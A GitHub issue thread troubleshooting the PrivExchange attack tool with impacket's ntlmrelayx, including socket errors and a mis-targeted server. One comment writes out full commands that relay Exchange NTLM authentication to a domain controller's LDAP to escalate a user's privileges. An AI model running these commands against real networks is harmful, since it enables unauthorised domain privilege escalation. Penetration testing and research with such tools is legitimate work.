### ISSUE TITLE
I am taking this error on windows 10. I disabled the firewall. What can be the problem?

### ISSUE THREAD

**Issue by frkntrn** [dirkjanm/PrivExchange#11]
File ".\ntlmrelayx.py", line 336, in <module>
    c = start_servers(options, threads)
  File ".\ntlmrelayx.py", line 169, in start_servers
    s = server(c)
  File "build\bdist.win-amd64\egg\impacket\examples\ntlmrelayx\servers\smbrelayserver.py", line 88, in __init__
  File "build\bdist.win-amd64\egg\impacket\smbserver.py", line 3703, in __init__

  File "c:\python27\lib\SocketServer.py", line 417, in __init__
    self.server_bind()
  File "c:\python27\lib\SocketServer.py", line 431, in server_bind
    self.socket.bind(self.server_address)
  File "c:\python27\lib\socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 10013] An attempt was made to access a socket in a way forbidden by its access permissions

**Comment by dirkjanm** [comment]
By default ntlmrelayx will try to listen on port 445, which is not possible on Windows because it uses it exclusively for the SMB server. You can disable this in ntlmrelayx by specifying the `--no-smb-server` option (only if you're using the latest version from the master branch [on git](https://github.com/SecureAuthCorp/impacket/) )

**Comment by sostoli** [comment]
Hello Dirk,
I came across a 'Connection refused' error
When i ran ntlmrelayx, it works perfectly, waiting for connections,
**sudo ntlmrelayx.py -t ldap://srv00dc01.mydomain.com --escalate-user pentest1**
[sudo] password for hp: 
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections_

**Right after i start privexchange this way** 

_**python privexchange.py -ah 10.31.0.162 srv00dc01.mydomain.com -u pentest1 -d domain.com**
Password: 
INFO: Using attacker URL: http://10.31.0.162/privexchange/
/EWS/Exchange.asmx
Traceback (most recent call last):
  File "privexchange.py", line 222, in <module>
    main()
  File "privexchange.py", line 141, in main
    session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
  File "/usr/lib/python2.7/httplib.py", line 1057, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib/python2.7/httplib.py", line 1097, in _send_request
    self.endheaders(body)
  File "/usr/lib/python2.7/httplib.py", line 1053, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 897, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 859, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 1270, in connect
    HTTPConnection.connect(self)
  File "/usr/lib/python2.7/httplib.py", line 836, in connect
    self.timeout, self.source_address)
  File "/usr/lib/python2.7/socket.py", line 575, in create_connection
    raise err
**socket.error: [Errno 111] Connection refused**_
I try this on differents attacking machine, but i have the same result.
However when i try to login manually to the web service on port 80 started by ntlmrelayx, i am able to dump info from the domain controller.

**Comment by dirkjanm** [comment]
You seem to point privexchange.py to your DC instead of the Exchange server in your second command.

**Comment by sostoli** [comment]
Thx. You are totally right. Now API call is successful yet i have no return in the ntlmrelayx windows even after 30mn.
